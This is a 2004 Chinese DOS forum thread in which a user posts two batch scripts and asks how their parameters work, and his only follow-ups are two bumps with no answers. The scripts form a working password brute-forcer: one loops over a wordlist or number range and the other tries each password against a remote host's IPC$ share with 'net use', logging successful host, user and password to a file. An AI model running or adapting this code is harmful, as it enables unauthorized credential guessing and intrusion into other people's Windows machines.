中国DOS联盟

-- 联合DOS 推动DOS 发展DOS --

联盟域名:www.cn-dos.net 论坛域名:www.cn-dos.net/forum
DOS,代表着自由开放与发展,我们努力起来,学习FreeDOS和Linux的自由开放与GNU精神,共同创造和发展美好的自由与GNU GPL世界吧!

中国DOS联盟论坛
现在时间是 2026-06-28 10:26
中国DOS联盟论坛 » DOS疑难解答 & 问题讨论 (解答室) » [求助]关于向个FOR命令看也看不懂! 查看 529 回复 2
楼 主 [求助]关于向个FOR命令看也看不懂! 发表于 2004-10-30 00:00 ·  中国 广东 东莞 电信
初级用户
积分 134
发帖 12
注册 2004-10-30 00:00
21年会员
UID 33090
性别 男
状态 离线
虽然看了说明也弄不明白,请大家指点一下
下面文件为pass.bat:
if "%6"=="1" goto shit2
:shit1
start "正在破解" /min cmd /c for /f %%i in (%1) do call test.bat %2 "%%i" %3
goto quit
:shit2
start "正在破解" /min cmd /c for /l %%i in (%1,%2,%3) do call test.bat %4 "%%i" %5
:quit

下面文件为test.bat:
net use \\%1\ipc$ %2 /user:"%3"
goto answer%ERRORLEVEL%
rem %ERRORLEVEL%表示取前一命令执行返回结果,net use成功返回0,失败返回2
:answer0
echo 远程主机:"%1" >>c:\pass.txt
echo 用 户:"%3" >>c:\pass.txt
echo 密 码:%2 >>c:\pass.txt
net use \\%1\ipc$ /delet
exit
:answer2

谁能解释下,第一个1%和第二个里的1%是同一参数吗?6%是什么意思?
2 发表于 2004-10-31 00:00 ·  中国 广东 东莞 电信
初级用户
积分 134
发帖 12
注册 2004-10-30 00:00
21年会员
UID 33090
性别 男
状态 离线
没人答复啊?
3 发表于 2004-11-01 00:00 ·  中国 广东 东莞 电信
初级用户
积分 134
发帖 12
注册 2004-10-30 00:00
21年会员
UID 33090
性别 男
状态 离线
都不接招?
论坛跳转: